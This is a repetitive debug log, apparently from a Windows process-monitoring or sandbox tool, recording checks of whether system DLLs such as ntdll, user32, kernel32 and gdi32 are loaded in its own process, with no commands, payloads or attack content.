2020-03-24 10:13:37,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,240 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,256 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,302 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,318 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,318 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,318 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,318 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:37,318 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:37,318 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:37,318 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:37,365 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:37,365 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:37,427 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:37,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:37,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,443 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,443 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:37,443 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,443 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,443 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,443 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,443 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:37,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,490 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:37,505 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:37,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:37,505 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:37,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:37,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:37,520 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:37,520 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:37,520 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:37,520 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:37,520 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:37,520 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:37,520 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:37,520 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:37,536 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:37,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:37,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,552 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,568 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,568 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,568 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,568 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,568 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,568 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,598 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,598 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,614 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,630 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,645 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,645 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,645 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,645 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,645 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,645 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,645 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,661 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,677 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,691 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,707 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,723 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,739 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,769 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:37,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,816 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:37,832 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
